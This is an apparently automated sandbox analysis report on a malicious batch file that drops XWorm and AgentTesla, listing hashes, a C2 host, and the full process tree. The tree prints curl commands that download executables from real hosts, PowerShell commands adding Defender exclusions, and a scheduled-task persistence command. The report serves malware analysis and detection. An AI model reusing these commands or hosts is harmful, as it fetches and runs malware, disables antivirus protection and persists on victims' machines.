Analysis
-
max time kernel
128s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
02-12-2023 10:22
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.GVCLIENTV35bat.bat
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
NEAS.GVCLIENTV35bat.bat
Resource
win10v2004-20231127-en
General
-
Target
NEAS.GVCLIENTV35bat.bat
-
Size
20KB
-
MD5
a7793c10f4e024c789964be67375ab2a
-
SHA1
988d0af9a4ca435dd084ce541a250f6ba57f590a
-
SHA256
770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
-
SHA512
50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
-
SSDEEP
384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO
Malware Config
Extracted
xworm
goofyah-26004.portmap.host:26004
-
Install_directory
%AppData%
-
install_file
GVClientV4.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 6 IoCs
Processes:
resource yara_rule C:\Windows\GV Client V4 BETA.exe family_xworm C:\Windows\GV Client V4 BETA.exe family_xworm C:\Windows\GV Client V4 BETA.exe family_xworm behavioral2/memory/2832-27-0x0000000000610000-0x000000000062A000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\GVClientV4.exe family_xworm C:\Users\Admin\AppData\Roaming\GVClientV4.exe family_xworm -
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2568-13-0x000001E4FFD10000-0x000001E4FFF26000-memory.dmp family_agenttesla -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
GV Client V4 BETA.exea.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation GV Client V4 BETA.exe Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation a.exe -
Drops startup file 2 IoCs
Processes:
GV Client V4 BETA.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk GV Client V4 BETA.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk GV Client V4 BETA.exe -
Executes dropped EXE 4 IoCs
Processes:
GV-Loader.exea.exeGV Client V4 BETA.exeGVClientV4.exepid process 2568 GV-Loader.exe 1364 a.exe 2832 GV Client V4 BETA.exe 792 GVClientV4.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
GV Client V4 BETA.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GVClientV4 = "C:\\Users\\Admin\\AppData\\Roaming\\GVClientV4.exe" GV Client V4 BETA.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 44 ip-api.com -
Drops file in Windows directory 1 IoCs
Processes:
a.exedescription ioc process File created C:\Windows\GV Client V4 BETA.exe a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4740 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
GV-Loader.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS GV-Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer GV-Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion GV-Loader.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2228 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
GV Client V4 BETA.exepid process 2832 GV Client V4 BETA.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGV Client V4 BETA.exepid process 3572 powershell.exe 3572 powershell.exe 4612 powershell.exe 4612 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 2244 powershell.exe 2244 powershell.exe 2244 powershell.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 2832 GV Client V4 BETA.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
GV-Loader.exeGV Client V4 BETA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGVClientV4.exedescription pid process Token: SeDebugPrivilege 2568 GV-Loader.exe Token: SeDebugPrivilege 2832 GV Client V4 BETA.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 2832 GV Client V4 BETA.exe Token: SeDebugPrivilege 792 GVClientV4.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
GV Client V4 BETA.exepid process 2832 GV Client V4 BETA.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
cmd.exea.exeGV Client V4 BETA.execmd.exedescription pid process target process PID 4380 wrote to memory of 4892 4380 cmd.exe cacls.exe PID 4380 wrote to memory of 4892 4380 cmd.exe cacls.exe PID 4380 wrote to memory of 1404 4380 cmd.exe curl.exe PID 4380 wrote to memory of 1404 4380 cmd.exe curl.exe PID 4380 wrote to memory of 2328 4380 cmd.exe curl.exe PID 4380 wrote to memory of 2328 4380 cmd.exe curl.exe PID 4380 wrote to memory of 2172 4380 cmd.exe curl.exe PID 4380 wrote to memory of 2172 4380 cmd.exe curl.exe PID 4380 wrote to memory of 2228 4380 cmd.exe notepad.exe PID 4380 wrote to memory of 2228 4380 cmd.exe notepad.exe PID 4380 wrote to memory of 2568 4380 cmd.exe GV-Loader.exe PID 4380 wrote to memory of 2568 4380 cmd.exe GV-Loader.exe PID 4380 wrote to memory of 1364 4380 cmd.exe a.exe PID 4380 wrote to memory of 1364 4380 cmd.exe a.exe PID 4380 wrote to memory of 1364 4380 cmd.exe a.exe PID 4380 wrote to memory of 1392 4380 cmd.exe PING.EXE PID 4380 wrote to memory of 1392 4380 cmd.exe PING.EXE PID 1364 wrote to memory of 3572 1364 a.exe powershell.exe PID 1364 wrote to memory of 3572 1364 a.exe powershell.exe PID 1364 wrote to memory of 3572 1364 a.exe powershell.exe PID 1364 wrote to memory of 2832 1364 a.exe GV Client V4 BETA.exe PID 1364 wrote to memory of 2832 1364 a.exe GV Client V4 BETA.exe PID 2832 wrote to memory of 4612 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 4612 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 4316 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 4316 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 2244 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 2244 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 3036 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 3036 2832 GV Client V4 BETA.exe powershell.exe PID 2832 wrote to memory of 4848 2832 GV Client V4 BETA.exe schtasks.exe PID 2832 wrote to memory of 4848 2832 GV Client V4 BETA.exe schtasks.exe PID 2832 wrote to memory of 3976 2832 GV Client V4 BETA.exe schtasks.exe PID 2832 wrote to memory of 3976 2832 GV Client V4 BETA.exe schtasks.exe PID 2832 wrote to memory of 3584 2832 GV Client V4 BETA.exe cmd.exe PID 2832 wrote to memory of 3584 2832 GV Client V4 BETA.exe cmd.exe PID 3584 wrote to memory of 4740 3584 cmd.exe timeout.exe PID 3584 wrote to memory of 4740 3584 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEAS.GVCLIENTV35bat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:4892
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe2⤵PID:1404
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt2⤵PID:2328
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe2⤵PID:2172
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exeC:\Users\Admin\AppData\Local\Temp\GV-Loader.exe2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2568 -
C:\Users\Admin\AppData\Roaming\a.exeC:\Users\Admin\AppData\Roaming\a.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAYgBjACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572 -
C:\Windows\GV Client V4 BETA.exe"C:\Windows\GV Client V4 BETA.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\GV Client V4 BETA.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GV Client V4 BETA.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GVClientV4.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GVClientV4.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GVClientV4" /tr "C:\Users\Admin\AppData\Roaming\GVClientV4.exe"4⤵
- Creates scheduled task(s)
PID:4848 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "GVClientV4"4⤵PID:3976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6B72.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:4740 -
C:\Windows\system32\PING.EXEping -n 5 127.0.0.12⤵
- Runs ping.exe
PID:1392
-
C:\Users\Admin\AppData\Roaming\GVClientV4.exeC:\Users\Admin\AppData\Roaming\GVClientV4.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:792
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD5b51dc9e5ec3c97f72b4ca9488bbb4462
SHA15c1e8c0b728cd124edcacefb399bbd5e25b21bd3
SHA256976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db
SHA5120e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280
-
Filesize
944B
MD5a2c8179aaa149c0b9791b73ce44c04d1
SHA1703361b0d43ec7f669304e7c0ffbbfdeb1e484ff
SHA256c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a
SHA5122e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3
-
Filesize
18KB
MD595bb29ce22e6844175d9c8109590524c
SHA15c220efc17cd71c7701332ba2c1ae39e02373e13
SHA256f0ac74dde7f11dccdca3a9f4a9aaf29a02cce855ab3d235783fb45951232db63
SHA51258ca40bbed239a202a4d6630c25531b8d21437d003abfd88cd5b9a4a1aee50bd66fec168ad89bfd6b2283a876f88b05905022d92bb985a90253683fdc7a05c18
-
Filesize
1.6MB
MD57954b6812ec1eefe82b89dea0c1c8001
SHA1db444d74258448e24d7aa1a26d71cea4c7fe492b
SHA25642810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
SHA512bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5
-
Filesize
1.6MB
MD57954b6812ec1eefe82b89dea0c1c8001
SHA1db444d74258448e24d7aa1a26d71cea4c7fe492b
SHA25642810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
SHA512bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5
-
Filesize
555B
MD51c01acde55c409853a8bb588c523e810
SHA1f4be783a9aaec4a89e3631b4e843fcc7d44bfdda
SHA256a851dc4829abc9a3dc25f7f2959de008a151f11c934635f09e16926b73625872
SHA512700bd27279429849f8392de2f0c36c842fed1b12baa5bf8b15e4d56116d44a0161f8a11d4e4a97af81c3ad09c1e842e5e26ff26252b8d4ff59a90f506f001372
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
146B
MD500c4ade55469e35cdb2ee9a50305d91e
SHA1abf01856299ca85ca5b111603e5e7c7941e74892
SHA2564009eda5ed067f6e4eade6212501c9d37a4969f0e2fd9d4f396bd9980f964bac
SHA512e785779b9a5d14ca16a59eb48129f91605faad374f421cefea4db2e2294ddf84048219d4f4439955c7e6deda148773aab00d83e93f99c27440e6aeb7b181f10f
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
85KB
MD5f4fdac362f860520d28385d92c288a7c
SHA19d7add3ef8a94821eff53b9f3b6634a204248a08
SHA256bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367
SHA512097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c
-
Filesize
85KB
MD5f4fdac362f860520d28385d92c288a7c
SHA19d7add3ef8a94821eff53b9f3b6634a204248a08
SHA256bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367
SHA512097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26